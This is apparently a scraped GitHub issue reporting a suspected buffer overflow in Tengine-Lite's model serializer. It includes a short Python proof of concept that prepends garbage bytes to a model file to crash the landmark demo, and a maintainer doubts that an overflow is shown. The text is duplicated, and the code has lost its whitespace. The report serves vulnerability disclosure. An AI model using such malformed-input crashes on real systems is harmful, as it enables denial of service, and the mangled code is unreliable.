The problem is in the load_model function starting at line 798, which calls the get_tm_file_model function at line 840
The first parameter mem_base of the get_tm_file_model function points to the address space where the model file is located, and the second parameter is controlled by mem_base. For this project, the model is an input controlled by the user, so the parameters of get_tm_file_model can be controlled.
Poc
Download the official example model, and select the landmark model to demonstrate here.
According to the official use case, the landmark model is run normally, and the program executes normally.
Write 9 bytes of garbage data to the header of the landmark.tmfile file, and then run the landmark model. Program routine error.
Write 10 bytes of garbage data to the header of the landmark.tmfile file, and then run the landmark model. program crash.
EXP:
importosos.system('cp landmark.tmfile test.tmfile')
withopen("./test.tmfile","rb+") asf:
old=f.read()
len=0xAprint('Writes %d bytes of data to the file header'%(len))
text=b'A'*lenf.seek(0)
f.write(text)
f.write(old)
os.system('./attack.sh')
'''attack.shdir='/mnt/hgfs/starcross/CVE/Tengine-Lite' export LD_LIBRARY_PATH=$dir/build/install/lib $dir/build/install/bin/tm_landmark -m $dir/model/landmark/test.tmfile -i $dir/model/landmark/photo.jpg -r 1 -t 1'''
The text was updated successfully, but these errors were encountered:
Thanks for reporting the potential issue.
As the model header with wrong content will cause program crash and it is that what you observed. I don't think there is an proof of overflow so far.
Vulnerability analysis
We found that in the seriliazer module, there is a buffer overflow problem
Link:https://github.com/OAID/Tengine/blob/tengine-lite/src/serializer/tm/tm2_serializer.c
The problem is in the
load_modelfunction starting at line 798, which calls theget_tm_file_modelfunction at line 840The first parameter
mem_baseof theget_tm_file_modelfunction points to the address space where the model file is located, and the second parameter is controlled bymem_base. For this project, the model is an input controlled by the user, so the parameters ofget_tm_file_modelcan be controlled.Poc
Download the official example model, and select the landmark model to demonstrate here.
According to the official use case, the landmark model is run normally, and the program executes normally.
Write 9 bytes of garbage data to the header of the landmark.tmfile file, and then run the landmark model. Program routine error.
Write 10 bytes of garbage data to the header of the landmark.tmfile file, and then run the landmark model. program crash.
EXP:
The text was updated successfully, but these errors were encountered: